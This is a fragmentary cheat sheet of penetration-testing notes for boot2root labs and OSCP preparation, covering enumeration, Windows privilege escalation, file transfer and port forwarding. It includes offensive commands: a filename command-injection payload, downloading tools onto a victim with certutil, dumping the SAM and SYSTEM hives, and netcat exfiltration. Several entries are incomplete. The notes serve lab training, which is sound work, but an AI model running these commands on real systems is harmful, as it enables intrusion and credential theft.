Hacking boot2root/ OSCP notes
Service Enumeration
nmap IP --script 'smb-vuln\*' -p139,445
smbmap -H IP
Sometimes the following error occurs
protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED
The fix was to add
client min protocl = LANMAN1
Try basic payloads
Don't use sqlmap
see MAIL
If in remmina it doesn't connect try to change the
security protocol negotiation
to RDPIf in case you have to use proxy in remmina and SSH tunnel won't do then do the following
Add the connection via remmina GUI without any SSH tunnel
go to
and find the fileAdd all proxy setting there(https://gitlab.com/Remmina/Remmina/-/merge_requests/1927) - Backups mostly contains .gz or .bak, if any file with non root perms is there or any file without those extension then check that out.
If you have downloaded the VM from Website like Vulnhub or any other website then make sure you run it in
mode. Even though Vulnhub can be super trusted but still it's good to be paranoid.Most of the VM with
as their default network setting.Also if you want to be super paranoid then go for NAT setting but I've had issues with some VMs in
network setting.
Enumeration is the Key but only till a certain level. Lot of times the way is too guessy, too CTF type and that point
doesn't help at all. So if you have done the basics of enumeration like for HTTP service fuzzing, dirsearch etc then don't worry it's totally okay to ask for a damn hint.Always take a good look of what you've found
php file type can be bypassed by php5
If in a file upload the output is shown meaning it's processing the upload
exploit it with command injection in filename like "shell.txt;id"
Change Static IP
sudo ifconfig vmnet1 netmask
VMware /dev/vmmon not loaded
sudo vmware-modconfig --console --install-all
sudo vmware-modconfig --console --install-all
Fix the issue of vmware modprobe error
If cracking password for kdbx takes longer time then try finding a key file for it.
For git repos always check out the git logs
If for some reason dirsearch or gobuster doesn't work on any URL or if they show every URL as the right try to use wfuzz
wfuzz -c -w wordlist --hw 12 --hc 400 URL
Reverse shell for windows
If you can upload any file then try to upload
and use that.
To get enumeration file use
certutils -urlcache -split -f URL
when powershell is present
Invoke-WebRequest URL -outfile file
Use powerups.ps1 enumeration script
Run it with
powershell.exe -ExecutionPolicy Bypass -File .\powersup.ps1
checking privileges
https://github.com/itm4n/PrintSpoofer - Incase we need to exploit some
- Check DiscoDump SAM and System
reg save HKLM\SAM c:\SAM reg save HKLM\System c:\System
Check file and folder permissions
In order to see service information -
sc.exe qc <servicename>
Path Traversal - https://gracefulsecurity.com/path-traversal-cheat-sheet-windows/
Always check
whoami /priv
In windows run winpeas.exe like
If doing manual enum run -
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
Change host timezone
echo "Asia/kolkata" > /etc/timezone
dpkg-reconfigure -f noninteractive tzdata
Always run dirsearch with extensions
python dirsearch.py -f -e html,php,tar.gz,txt,xml,zip,jpg,png,jpeg -u IP LIST
Port knocking with nmap
for x in 066 666 3432; do nmap -Pn --max-retries 0 -p $x; done
If you find set of 3 numbers possible options is port knocking
Transfer with ncat
nc -q1 -lvp 1234 < file
- on victim machinenc IP 1234> file
- on attackers machine
dig axfr somedomain
to actually find other zone tranfsercheckout tempus fugit writeup
If enum/sudo doesn't do any good.....check for writeable dirs
find / -type d 2>/dev/null
LFI to RCE via SSH log poisoning
To escape eval in python
Remote port forwarding:
ssh -R port-to-frwd:internal-IP:service-port mzfr@user-IP
ssh -R 44325: mzfr@
If you don't find anything in /opt or /var/ then checkout /logs and /backups
Last updated